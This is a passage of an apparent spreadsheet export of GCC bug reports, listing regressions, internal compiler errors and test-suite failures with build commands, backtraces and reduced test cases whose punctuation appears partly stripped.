&gt;
&gt; I used the files from trunk revision 124627 and the build went fine.
&gt;
&gt; I'll try to find some time to fill a PR</t>
  </si>
  <si>
    <t>GCC-54371</t>
  </si>
  <si>
    <t>[4.8 Regression] jump tables are broken on n64 mips64-linux-gnu</t>
  </si>
  <si>
    <t>In the last week something caused lots of failures on mips64-linux-gnu.
FAIL: gcc.dg/cleanup-10.c execution test
FAIL: gcc.dg/cleanup-11.c execution test
FAIL: gcc.dg/cleanup-12.c execution test
FAIL: gcc.dg/cleanup-13.c execution test
FAIL: gcc.dg/cleanup-5.c execution test
FAIL: gcc.dg/cleanup-8.c execution test
FAIL: gcc.dg/cleanup-9.c execution test
FAIL: gcc.dg/duff-3.c execution test
FAIL: 23_containers/vector/bool/modifiers/insert/31370.cc execution test
FAIL: 23_containers/vector/capacity/2.cc execution test
FAIL: 23_containers/vector/capacity/29134-2.cc execution test
FAIL: 23_containers/vector/capacity/8230.cc execution test
FAIL: 23_containers/vector/capacity/resize/1.cc execution test
FAIL: 23_containers/vector/cons/4.cc execution test
FAIL: 23_containers/vector/element_access/1.cc execution test
FAIL: 23_containers/forward_list/requirements/exception/basic.cc execution test
FAIL: 23_containers/vector/ext_pointer/modifiers/element.cc execution test
FAIL: 23_containers/forward_list/requirements/exception/propagation_consistent.cc execution test
--- CUT ---
The last known good compiler was from:
LAST_UPDATED: Wed Aug 15 07:04:20 UTC 2012 (revision 190406)</t>
  </si>
  <si>
    <t>GCC-32182</t>
  </si>
  <si>
    <t>[4.2 Regression] -fstrict-aliasing optimizations cause constructor not to run for object causing segfault</t>
  </si>
  <si>
    <t>I may have found a situation where GCC's optimizations causes a constructor to be skipped that leads to a crash.  This problem first manifested itself in a program involving well over 100000 lines of code (not including the extra lines from #include'd files).  The initial problem is in code generated by Babel http://www.llnl.gov/CASC/compnents/ in the runC2Cxx program part of the objarg regression test. After many hours of work I've reproduced the bug with a program involving only 324 lines.
% wc *.c *.h *.hxx *.cxx
  45  108  861 main.c
  55  136 1174 RefCount.c
  35   59  503 RefCount.h
  78  170 1426 Wrapper.hxx
 111  239 2052 Wrapper.cxx
 324  712 6016 total
I compile these files with the following script:
#!/bin/sh
\rm -f *.o test_aliasing test_noaliasing
gcc-4.2 -g -O2  -c RefCount.c main.c Wrapper.cxx
g++-4.2 -g  -O2   -o test_aliasing RefCount.o main.o Wrapper.o
gcc-4.2 -g -O2 -fno-strict-aliasing -c RefCount.c main.c Wrapper.cxx
g++-4.2 -g  -O2 -fno-strict-aliasing  -o test_noaliasing RefCount.o main.o Wrapper.o
./test_noaliasing runs without crashing and ./test_aliasing crashes in this operator= method:
TestClass &amp;
TestClass::operator =(const TestClass &amp;rhs)
{
  if (d_self != rhs.d_self) {
    if (d_self) {
      /* segfault at next line because d_self wasn't initialized to 0 */
      deleteRef(reinterpret_cast(d_self))
    }
    d_self = rhs.d_self
    if (d_self) {
      addRef(reinterpret_cast(d_self))
    }
  }
  return *this
}
when called from this extern C function:
struct Test *
getItem(struct C_Container *cont
	int ind)
{
  struct Test *result = 0
  TestClass _local_result
  try {
    _local_result = cont-&gt;d_cont-&gt;at(ind) /* crash here */
  }
  catch(...) {
    return result
  }
  result = _local_result.getIOR()
  if (result) {
    addRef(reinterpret_cast(result))
  }
  return  result
}
In getItem it appears to have skipped executing empty constructor for _local_result that initializes d_self to 0.
Here is the declaration for TestClass and its super classes.
class BaseClass {
protected:
  void *d_self
public:
  BaseClass() : d_self(0) {}
  BaseClass(void *ior) : d_self(ior) {}
  ~BaseClass() {
    if (d_self) {
      struct RefCount_t *ref = 
	reinterpret_cast(d_self)
      deleteRef(ref)
      d_self = 0
    }
  }
}
class NextClass : public virtual BaseClass {
public:
  typedef struct Next ior_t
  NextClass() {}
  NextClass(ior_t *ior)
}
class TestClass : public virtual NextClass {
public:
  typedef struct Test ior_t
  TestClass() {}
  TestClass(ior_t *ior)
  virtual ~TestClass() { }
  TestClass(const TestClass 
  TestClass
  ior_t *getIOR() const { return reinterpret_cast (d_self) }
  long getNum() const { return reinterpret_cast(d_self)-&gt;num }
}
My understanding is the _local_result should be initialized by running with the TestClass::TestClass() constructor which fires after the NextClass::NextClass() constructor which fires after the BaseClass::BaseClass() constructor where d_self is initialized to 0. If I add a printf(Hello\n) call inside the BaseClass() constructor it runs and the program doesn't segfault.
The output from running valgrind on the executable supports the idea that d_self is not being initialized.
% valgrind ./test_aliasing
==30651== Memcheck a memory error detector.
==30651== Copyright (C) 2002-2007 and GNU GPL'd by Julian Seward et al.
==30651== Using LibVEX rev 1732 a library for dynamic binary translation.
==30651== Copyright (C) 2004-2007 and GNU GPL'd by OpenWorks LLP.
==30651== Using valgrind-3.2.3-Debian a dynamic binary instrumentation framework.
==30651== Copyright (C) 2000-2007 and GNU GPL'd by Julian Seward et al.
==30651== For more details rerun with: -v
==30651==
==30651== Conditional jump or move depends on uninitialised value(s)
==30651==    at 0x80489E5: TestClass::operator=(TestClass const&amp;) (Wrapper.cxx:30)
==30651==    by 0x8048BE2: getItem (Wrapper.cxx:101)
==30651==    by 0x804887B: main (main.c:35)
==30651==
==30651== Conditional jump or move depends on uninitialised value(s)
==30651==    at 0x80489E9: TestClass::operator=(TestClass const&amp;) (Wrapper.cxx:31)
==30651==    by 0x8048BE2: getItem (Wrapper.cxx:101)
==30651==    by 0x804887B: main (main.c:35)
==30651==
==30651== Use of uninitialised value of size 4
==30651==    at 0x8048716: deleteRef (RefCount.c:52)
==30651==    by 0x80489F2: TestClass::operator=(TestClass const&amp;) (Wrapper.cxx:33)
==30651==    by 0x8048BE2: getItem (Wrapper.cxx:101)
==30651==    by 0x804887B: main (main.c:35)
==30651==
==30651== Process terminating with default action of signal 11 (SIGSEGV)
==30651==  Bad permissions for mapped region at address 0x8048EB4
==30651==    at 0x804871D: deleteRef (RefCount.c:52)
==30651==    by 0x80489F2: TestClass::operator=(TestClass const&amp;) (Wrapper.cxx:33)
==30651==    by 0x8048BE2: getItem (Wrapper.cxx:101)
==30651==    by 0x804887B: main (main.c:35)
==30651==
==30651== ERROR SUMMARY: 3 errors from 3 contexts (suppressed: 19 from 1)
==30651== malloc/free: in use at exit: 1008 bytes in 12 blocks.
==30651== malloc/free: 12 allocs 0 frees 1008 bytes allocated.
==30651== For counts of detected errors rerun with: -v
==30651== searching for pointers to 12 not-freed blocks.
==30651== checked 100788 bytes.
==30651==
==30651== LEAK SUMMARY:
==30651==    definitely lost: 0 bytes in 0 blocks.
==30651==      possibly lost: 0 bytes in 0 blocks.
==30651==    still reachable: 1008 bytes in 12 blocks.
==30651==         suppressed: 0 bytes in 0 blocks.
==30651== Rerun with --leak-check=full to see details of leaked memory.
Segmentation fault
The program doesn't crash when compiled with Intel's 9.0.21 C++ compiler. It doesn't crash when compiled with pre-4.2 GCC versions either.
Based on this evidence it seems possible that this illustrates a case of over zealous optimization.
Release:	gcc-4.2 (GCC) 4.2.1 20070525 (prerelease) (Debian 4.2-20070525-1)
System: Linux driftcreek 2.6.18-4-686 #1 SMP Wed May 9 23:03:12 UTC 2007 i686 GNU/Linux
Architecture: i686
configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-targets=all --disable-werror --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu</t>
  </si>
  <si>
    <t>epperly2</t>
  </si>
  <si>
    <t>GCC-12347</t>
  </si>
  <si>
    <t>[tree-ssa] IA64 bootstrap broken</t>
  </si>
  <si>
    <t>The ICE happens while building libstdc++.  
/tmp/cvs/gcc-20030920/Build/gcc/xgcc -shared-libgcc -B/tmp/cvs/gcc-20030920/ 
Build/gcc/ -nostdinc++ -L/tmp/cvs/gcc-20030920/Build/ia64-suse-linux/libstdc+ 
+-v3/src -L/tmp/cvs/gcc-20030920/Build/ia64-suse-linux/libstdc++-v3/src/.libs  
-B/usr/local/ia64-suse-linux/bin/ -B/usr/local/ia64-suse-linux/lib/ -isystem / 
usr/local/ia64-suse-linux/include -isystem /usr/local/ia64-suse-linux/ 
sys-include -I/tmp/cvs/gcc-20030920/Build/ia64-suse-linux/libstdc++-v3/include/ 
ia64-suse-linux -I/tmp/cvs/gcc-20030920/Build/ia64-suse-linux/libstdc++-v3/ 
include -I/tmp/cvs/gcc-20030920/libstdc++-v3/libsupc++ -O2 -g -O2 -g -O2  
-D_GNU_SOURCE -fno-implicit-templates -Wall -Wno-format -W -Wwrite-strings  
-fdiagnostics-show-location=once -ffunction-sections -fdata-sections  
-c ../../../../libstdc++-v3/src/locale-inst.cc  -fPIC -DPIC -o .libs/ 
locale-inst.o  
/tmp/cvs/gcc-20030920/Build/ia64-suse-linux/libstdc++-v3/include/bits/ 
locale_facets.tcc: In  
   member function `_InIter std::money_get::do_get(_InIter   
   _InIter bool std::ios_base&amp; std::_Ios_Iostate&amp; long double&amp;) const [with   
   _CharT = char _InIter = std::istreambuf_iterator&lt;char   
   std::char_traits &gt;]':  
../../../../libstdc++-v3/src/locale-inst.cc:47:   instantiated from here  
/tmp/cvs/gcc-20030920/Build/ia64-suse-linux/libstdc++-v3/include/bits/ 
locale_facets.tcc:1120: internal compiler error: in  
   expand_expr at expr.c:6893  
Please submit a full bug report  
with preprocessed source if appropriate.  
See  for instructions.  
make[4]: *** [locale-inst.lo] Error 1  
make[4]: Leaving directory `/tmp/cvs/gcc-20030920/Build/ia64-suse-linux/libstdc 
++-v3/src'  
      /* If the mode of DECL_RTL does not match that of the decl it 
	 must be a promoted value.  We return a SUBREG of the wanted mode 
	 but mark it so that we know that it was already extended.  */ 
      if (GET_CODE (DECL_RTL (exp)) == REG 
	  &amp;&amp; GET_MODE (DECL_RTL (exp)) != DECL_MODE (exp)) 
	{ 
	  /* Get the signedness used for this variable.  Ensure we get the 
	     same mode we got when the variable was declared.  */ 
	  if (GET_MODE (DECL_RTL (exp)) 
	      != promote_mode (type DECL_MODE (exp) &amp;unsignedp 
			       (TREE_CODE (exp) == RESULT_DECL ? 1 : 0))) 
	    abort () 
	  temp = gen_lowpart_SUBREG (mode DECL_RTL (exp)) 
	  SUBREG_PROMOTED_VAR_P (temp) = 1 
	  SUBREG_PROMOTED_UNSIGNED_SET (temp unsignedp) 
	  return temp 
	}</t>
  </si>
  <si>
    <t>GCC-38045</t>
  </si>
  <si>
    <t>floating point exception triggered when it shouldn't be</t>
  </si>
  <si>
    <t>GCC version and linux distribution:
g++ (Gentoo 4.3.2 p1.1) 4.3.2
g++ (GCC) 4.3.0 20080428 (Red Hat 4.3.0-8)
g++ (Ubuntu 4.3.2-1ubuntu11) 4.3.2
Command line to trigger bug:
g++ crash.cpp -O2
Compiler output:
(none)
Executable input:
./a.out
Executable output:
Floating point exception 
Source file attached along with preprocessed file</t>
  </si>
  <si>
    <t>GCC-82069</t>
  </si>
  <si>
    <t>[8 Regression] ICE: Segmentation fault</t>
  </si>
  <si>
    <t>More r251433 outfall:
trippels@gcc2-power8 llvm_build % cat MapFile.ii
template  struct A { T operator[](int) }
void toString()
namespace lld {
void toString(int)
}
using namespace lld
template  void getSymbolStrings(A Syms) {
  [ }
}
trippels@gcc2-power8 llvm_build % g++ -c MapFile.ii
MapFile.ii: In lambda function:
MapFile.ii:8:18: internal compiler error: Segmentation fault
   [ }
0x10bc9783 crash_signal
        ../../gcc/gcc/toplev.c:341
0x1027fed4 hash_table tree_node*&gt; &gt;::hash_entry xcallocator&gt;::find_slot_with_hash(tree_node* const&amp; unsigned int insert_option)
        ../../gcc/gcc/hash-table.h:878
0x10280193 hash_map tree_node*&gt; &gt;::put(tree_node* const&amp; tree_node* const&amp;)
        ../../gcc/gcc/hash-map.h:137
0x10429847 register_local_specialization(tree_node* tree_node*)
        ../../gcc/gcc/cp/pt.c:1906
0x10429847 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:18153
0x1042890f tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:17911
0x1042990f tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:17533
0x10427aa7 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:17070
0x10428edf tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:17549
0x1027e32b fold_non_dependent_expr(tree_node*)
        ../../gcc/gcc/cp/constexpr.c:4936
0x1040cc0b build_non_dependent_expr(tree_node*)
        ../../gcc/gcc/cp/pt.c:24955
0x10495f1b finish_expr_stmt(tree_node*)
        ../../gcc/gcc/cp/semantics.c:693
0x103baa07 cp_parser_expression_statement
        ../../gcc/gcc/cp/parser.c:11127
0x103c899f cp_parser_statement
        ../../gcc/gcc/cp/parser.c:10887
0x103c9d03 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:11214
0x103caa67 cp_parser_lambda_body
        ../../gcc/gcc/cp/parser.c:10624
0x103caa67 cp_parser_lambda_expression
        ../../gcc/gcc/cp/parser.c:10079
0x103cba0b cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:5085
0x103ce58f cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:6907
0x103eebbf cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:8248</t>
  </si>
  <si>
    <t>GCC-23464</t>
  </si>
  <si>
    <t>[4.1 Regression] compat tests fail</t>
  </si>
  <si>
    <t>FAIL: tmpdir-gcc.dg-struct-layout-1/t001 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t002 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t005 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t024 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t025 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t026 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t027 c_compat_x_tst.o-c_compat_y_tst.o execute 
FAIL: tmpdir-gcc.dg-struct-layout-1/t028 c_compat_x_tst.o-c_compat_y_tst.o execute 
have appeared on mainline between 20050816 and 20050817 on hppa2.0w-hp-hpux11.11
and hppa64-hp-hpux11.11 gcc-testresults shows them also on hppa-linux.</t>
  </si>
  <si>
    <t>GCC-42897</t>
  </si>
  <si>
    <t>[4.5 Regression] yet another ice in verify_ssa</t>
  </si>
  <si>
    <t>I just tried to compile the package htmldoc-1.8.27-174.19 with the GNU
C++ compiler version 4.5 snapshot 20100128 and the compiler said
image.cxx:389:1: error: definition in block 7 does not dominate use in block 13
for SSA_NAME: i_36 in statement:
# DEBUG i =&gt; i_36
image.cxx:389:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flags -g -O3 required.
This bug looks similar to 40711 and 42299 but it does seem to be
different to me.</t>
  </si>
  <si>
    <t>GCC-2044</t>
  </si>
  <si>
    <t>errant template compilation errors</t>
  </si>
  <si>
    <t>On 2.95 sample code gives error iff template argument is a 
declared constant no error is argument is integer literal.
Error message is:
test2.cpp: In function `static void segmentedVector &gt;::UnitTest()':
test2.cpp:30:   instantiated from here
test2.cpp:27: conversion from `segmentedVector &gt;::Iterator' to non-scalar type `segmentedVector &gt;::Iterator' requested
On 3.0 (using webtest) gives error in both conditions message is:
/tmp/@18645.7.cc: In static member function `static void segmentedVector::UnitTest() [with T = int SizePolicy = 
         FixedSizeSegments]':
      /tmp/@18645.7.cc:29:   instantiated from here
      /tmp/@18645.7.cc:26: conversion from `segmentedVector 
         &gt;::Iterator' to non-scalar type `segmentedVector &gt;::Iterator' requested
BTW the 3.0 error message is probably the same message as the 2.95 but has less useful information
Release:
2.95 also 3.0
Environment:
igodard@pine  uname -a
Linux pine 2.2.12-20smp #1 SMP Mon Sep 27 10:34:45 EDT 1999 i686 unknown
How-To-Repeat:
compile sample code. There should not be an error reported 
under any condition that the error depends on whether a 
literal or a const is used (under 2.95) is bizarre.</t>
  </si>
  <si>
    <t>GCC-80910</t>
  </si>
  <si>
    <t>FAIL: gcc.target/x86_64/abi/ms-sys</t>
  </si>
  <si>
    <t>At r248422 with non-bootstrap compiler:
...
Running src/gcc/testsuite/gcc.target/x86_64/abi/ms-sysv/ms-sysv.exp ...
WARNING: Could not build gcc.target/x86_64/abi/ms-sysv generator
WARNING: Could not build gcc.target/x86_64/abi/ms-sysv generator
WARNING: Could not build gcc.target/x86_64/abi/ms-sysv generator
WARNING: Could not build gcc.target/x86_64/abi/ms-sysv generator
FAIL: gcc.target/x86_64/abi/ms-sysv CFLAGS=-O0 -g3 generator_args=-p0-5 --omit-rbp-clobbers
FAIL: gcc.target/x86_64/abi/ms-sysv CFLAGS=-O2 generator_args=-p0-5
FAIL: gcc.target/x86_64/abi/ms-sysv CFLAGS=-mcall-ms2sysv-xlogues -O0 -g3 generator_args=-p0-5 --omit-rbp-clobbers
FAIL: gcc.target/x86_64/abi/ms-sysv CFLAGS=-mcall-ms2sysv-xlogues -O2 generator_args=-p0-5
...
In more detail:
...
cc1plus: error: unrecognized command line option -std=c++11^M
...
I guess this .exp requires effective target c++11.</t>
  </si>
  <si>
    <t>GCC-6889</t>
  </si>
  <si>
    <t>genattrtab: Internal error: abort in make_numeric_value at ../../gcc/gcc/genattrtab.c:5931</t>
  </si>
  <si>
    <t>./genattrtab ../../gcc/gcc/config/pa/pa.md &gt; tmp-attrtab.c
Check description...done
Reservation transformation...done
In stage1 the following error occurs:
Create automaton `pa700'...done
Create automaton `pa7100'...done
Create automaton `pa7100lc'...done
Create automaton `pa8000'...done
Generation of attributes...genattrtab: Internal error: abort in make_numeric_val
ue at ../../gcc/gcc/genattrtab.c:5931
make[2]: *** [s-attrtab] Error 1
Release:
gcc 3.2 20020531 (experimental)
Environment:
hppa64-hp-hpux11*</t>
  </si>
  <si>
    <t>GCC-63666</t>
  </si>
  <si>
    <t>[5.0 regression] FAIL: gcc.dg/vect/pr45752.c (internal compiler error)</t>
  </si>
  <si>
    <t>Broken by r216728.
$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.dg/vect/pr45752.c -ftree-vectorize -fno-vect-cost-model -fno-common -O2 -fdump-tree-vect-details -lm -o ./pr45752.exe
../gcc/testsuite/gcc.dg/vect/pr45752.c: In function â€˜fooâ€™:
../gcc/testsuite/gcc.dg/vect/pr45752.c:38:6: internal compiler error: in ia64_vectorize_vec_perm_const_ok at config/ia64/ia64.c:11728
 void foo (unsigned int *__restrict__ pInput
      ^
0x4000000001069d9f ia64_vectorize_vec_perm_const_ok
        ../../gcc/config/ia64/ia64.c:11728
0x400000000090272f can_vec_perm_p(machine_mode bool unsigned char const*)
        ../../gcc/optabs.c:6611
0x4000000000f387df vect_transform_slp_perm_load(_slp_tree* vec gimple_stmt_iterator* int _slp_instance* bool)
        ../../gcc/tree-vect-slp.c:3049
0x4000000000f3c99f vect_supported_load_permutation_p
        ../../gcc/tree-vect-slp.c:1349
0x4000000000f3c99f vect_analyze_slp_instance
        ../../gcc/tree-vect-slp.c:1677
0x4000000000f3d28f vect_analyze_slp(_loop_vec_info* _bb_vec_info* unsigned int)
        ../../gcc/tree-vect-slp.c:1747
0x4000000000f1674f vect_analyze_loop_2
        ../../gcc/tree-vect-loop.c:1762
0x4000000000f1674f vect_analyze_loop(loop*)
        ../../gcc/tree-vect-loop.c:1875
0x4000000000f4659f vectorize_loops()
        ../../gcc/tree-vectorizer.c:442
0x4000000000d77abf execute
        ../../gcc/tree-ssa-loop.c:290</t>
  </si>
  <si>
    <t>GCC-48611</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE: SIGSEGV in remap_eh_region_nr (tree-inline.c:1194) with -Os -fopenmp -fexceptions -fno-tree-ccp -fno-tree-copy-prop on basic code</t>
  </si>
  <si>
    <t>Created attachment 23986
auto-reduced testcase
$ gcc -Os -fopenmp -fexceptions -fno-tree-ccp -fno-tree-copy-prop testcase-min1.f90
==12201== Invalid read of size 4
==12201==    at 0xBD4B3F: remap_eh_region_nr.isra.81 (tree-inline.c:1194)
==12201==    by 0xBD8A59: remap_gimple_stmt (tree-inline.c:1444)
==12201==    by 0xBD97EF: copy_cfg_body (tree-inline.c:1540)
==12201==    by 0xBDB6B6: copy_body (tree-inline.c:2410)
==12201==    by 0xBDE493: optimize_inline_calls (tree-inline.c:3928)
==12201==    by 0xBB67A2: cgraph_early_inlining (ipa-inline.c:1642)
==12201==    by 0x87F305: execute_one_pass (passes.c:1555)
==12201==    by 0x87F5F4: execute_pass_list (passes.c:1610)
==12201==    by 0x87E80B: do_per_function_toporder (passes.c:1141)
==12201==    by 0x87FA95: execute_ipa_pass_list (passes.c:1927)
==12201==    by 0xBAC6DC: cgraph_optimize (cgraphunit.c:1789)
==12201==    by 0xBAC949: cgraph_finalize_compilation_unit (cgraphunit.c:1102)
==12201==    by 0x836BFC: write_global_declarations (langhooks.c:303)
==12201==    by 0x96CC99: toplev_main (toplev.c:591)
==12201==    by 0x644AB6C: (below main) (in /lib64/libc-2.11.3.so)
==12201==  Address 0x18 is not stack'd malloc'd or (recently) free'd
==12201== 
testcase-min1.f90: In function 'main':
testcase-min1.f90:8:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-45367</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/bessel_6.f90 and gfortran.dg/bessel_7.f90</t>
  </si>
  <si>
    <t>On Linux/ia32 I got
FAIL: gfortran.dg/bessel_6.f90  -O0  execution test
FAIL: gfortran.dg/bessel_6.f90  -O1  execution test
FAIL: gfortran.dg/bessel_6.f90  -O2  execution test
FAIL: gfortran.dg/bessel_6.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/bessel_6.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/bessel_6.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/bessel_6.f90  -O3 -g  execution test
FAIL: gfortran.dg/bessel_6.f90  -Os  execution test
FAIL: gfortran.dg/bessel_7.f90  -O0  execution test
FAIL: gfortran.dg/bessel_7.f90  -O1  execution test
FAIL: gfortran.dg/bessel_7.f90  -O2  execution test
FAIL: gfortran.dg/bessel_7.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/bessel_7.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/bessel_7.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/bessel_7.f90  -O3 -g  execution test
FAIL: gfortran.dg/bessel_7.f90  -Os  execution test</t>
  </si>
  <si>
    <t>GCC-5818</t>
  </si>
  <si>
    <t>cc1plus crashes if it runs out of memory</t>
  </si>
  <si>
    <t>Very minor. I was having problems with a bug causing the allocation of hundreds of megabytes of memory swapping my machine to death so I set my memory ulimts to something like 16 megabytes. Then I compiled some code. A few times GCC died with warnings that virtual memory was exausted. But once I got this:
g++: Internal error: Segmentation fault (program cc1plus)
Please submit a full bug report.
See  for instructions.
So it seems that in at least one case GCC isn't checking it's system call returns properly (GCC compiles my code without problems when the memory ulimits are set higher so I'm quite certain this is not a code-dependant thing)
Release:
gcc 3.0.4
Environment:
Redhat Linux 7.2
AMD Athlon
How-To-Repeat:
Set your ulimits for memory very low. Compile something.</t>
  </si>
  <si>
    <t>GCC-67640</t>
  </si>
  <si>
    <t>driver passes -fdiagnostics-color= always last</t>
  </si>
  <si>
    <t>The driver alters the order when passing command-line options to the compiler proper. This means that -fdiagnostics-color has no chance to disable color before the first error is emitted:
$. /xgcc -B ./ ~/test.c -fdiagnostics-color=never -Wnoexcept -E -### 2&gt;&amp;1 | grep cc1
./cc1 -E -quiet -iprefix ./../lib/gcc/x86_64-pc-linux-gnu/6.0.0/ -isystem ./include -isystem ./include-fixed ./test.c -mtune=generic -march=x86-64 -Wnoexcept -fdiagnostics-color=never
$ ./xgcc -B ./ ~/test.c -Wnoexcept -fdiagnostics-color=never -E -### 2&gt;&amp;1 | grep cc1
./cc1 -E -quiet -iprefix ./../lib/gcc/x86_64-pc-linux-gnu/6.0.0/ -isystem ./include -isystem ./include-fixed ./test.c -mtune=generic -march=x86-64 -Wnoexcept -fdiagnostics-color=never</t>
  </si>
  <si>
    <t>GCC-38208</t>
  </si>
  <si>
    <t>[4.4 Regression] gcc.c-torture/compile/20080806-1.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 142072 gave:
Executing on host: /export/gnu/import/svn/gcc-test/bld/gcc/xgcc -B/export/gnu/import/svn/gcc-test/bld/gcc/   -O3 -fomit-frame-pointer -funroll-loops  -w -c  -m32 -o 20080806-1.o /export/gnu/import/svn/gcc-test/src-trunk/gcc/testsuite/gcc.c-torture/compile/20080806-1.c    (timeout = 300)
/tmp/ccuL0Iug.s: Assembler messages:^M
/tmp/ccuL0Iug.s:9: Warning: 65544 shortened to 8^M
+FAIL: gcc.c-torture/compile/20080806-1.c  -O3 -fomit-frame-pointer  (test for excess errors)
+FAIL: gcc.c-torture/compile/20080806-1.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
+FAIL: gcc.c-torture/compile/20080806-1.c  -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
Revision 142058 is OK.</t>
  </si>
  <si>
    <t>GCC-45105</t>
  </si>
  <si>
    <t>[4.6 Regression] -fcompare-debug failure at -Os</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -Os -fcompare-debug testcase.c
gcc: error: testcase.c: -fcompare-debug failure
Tested revisions:
r162618 - fail
r162456 - OK</t>
  </si>
  <si>
    <t>GCC-15742</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] 'noreturn' attribute ignored in method of template functions.</t>
  </si>
  <si>
    <t>The following code snippet:
extern void exit(int) __attribute__ ((noreturn))
template
  struct A {
    int find_cmp(void) { exit(1) }
  }
When compiled with -Wall gives:
&gt;g++-3.4.0 -Wall -c test.cc
test.cc: In member function `int A::find_cmp()':
test.cc:5: warning: no return statement in function returning non-void
Also broken in 3.5.0 20040530 (today).
Warning does not occur with 3.3.3.</t>
  </si>
  <si>
    <t>GCC-59271</t>
  </si>
  <si>
    <t>[4.9 Regression] a.C:16:21: internal compiler error: in strip_typedefs at cp/tree.c:1315</t>
  </si>
  <si>
    <t>void f(int n)
{
  int  a[n]
  for (auto&amp; i : a)
    {
      i = 
    }
  [&amp;a] (auto m)
    {
      for (auto i : a)
	{
	  cout &lt;&lt; i &lt;&lt; endl
	}
      return m
    }
}
g++ -std=c++1y -ggdb3 -o a a.C
a.C: In lambda function:
a.C:16:21: internal compiler error: in strip_typedefs at cp/tree.c:1315
       for (auto i : a)
                     ^
0x74b642 strip_typedefs(tree_node*)
	../../trunk/gcc/cp/tree.c:1315
0x74b221 strip_typedefs(tree_node*)
	../../trunk/gcc/cp/tree.c:1190
0x5e1b22 canonicalize_type_argument
	../../trunk/gcc/cp/pt.c:6231
0x6278f9 unify
	../../trunk/gcc/cp/pt.c:17445
0x6301f8 unify_one_argument
	../../trunk/gcc/cp/pt.c:16116
0x624fe9 type_unification_real
	../../trunk/gcc/cp/pt.c:16188
0x638d02 do_auto_deduction(tree_node* tree_node* tree_node*)
	../../trunk/gcc/cp/pt.c:21418
0x68e4b3 build_range_temp
	../../trunk/gcc/cp/parser.c:10068
0x6c1ddb do_range_for_auto_deduction
	../../trunk/gcc/cp/parser.c:10091
0x6c1ddb cp_parser_range_for
	../../trunk/gcc/cp/parser.c:10046
0x6c1ddb cp_parser_for
	../../trunk/gcc/cp/parser.c:9970
0x6c1ddb cp_parser_iteration_statement
	../../trunk/gcc/cp/parser.c:10436
0x6a0259 cp_parser_statement
	../../trunk/gcc/cp/parser.c:9297
0x6a1419 cp_parser_statement_seq_opt
	../../trunk/gcc/cp/parser.c:9674
0x6a2b18 cp_parser_lambda_body
	../../trunk/gcc/cp/parser.c:9178
0x6a2b18 cp_parser_lambda_expression
	../../trunk/gcc/cp/parser.c:8693
0x6a2b18 cp_parser_primary_expression
	../../trunk/gcc/cp/parser.c:4309
0x6a49e9 cp_parser_postfix_expression
	../../trunk/gcc/cp/parser.c:5908
0x6a71c8 cp_parser_unary_expression
	../../trunk/gcc/cp/parser.c:7109
0x6a7e5f cp_parser_binary_expression
	../../trunk/gcc/cp/parser.c:7813
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>darpeer</t>
  </si>
  <si>
    <t>GCC-70566</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] Bad ARM code generated for evaluating unsigned int bitfield value</t>
  </si>
  <si>
    <t>Created attachment 38204
main.c test case source
I have reproduced on gcc-4.9.2 gcc-4.9.3 and gcc-5.3.1 in Debian.
System type: ODROID-U2 (Exynos4412) ARMv7
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/arm-linux-gnueabihf/5/lto-wrapper
Target: arm-linux-gnueabihf
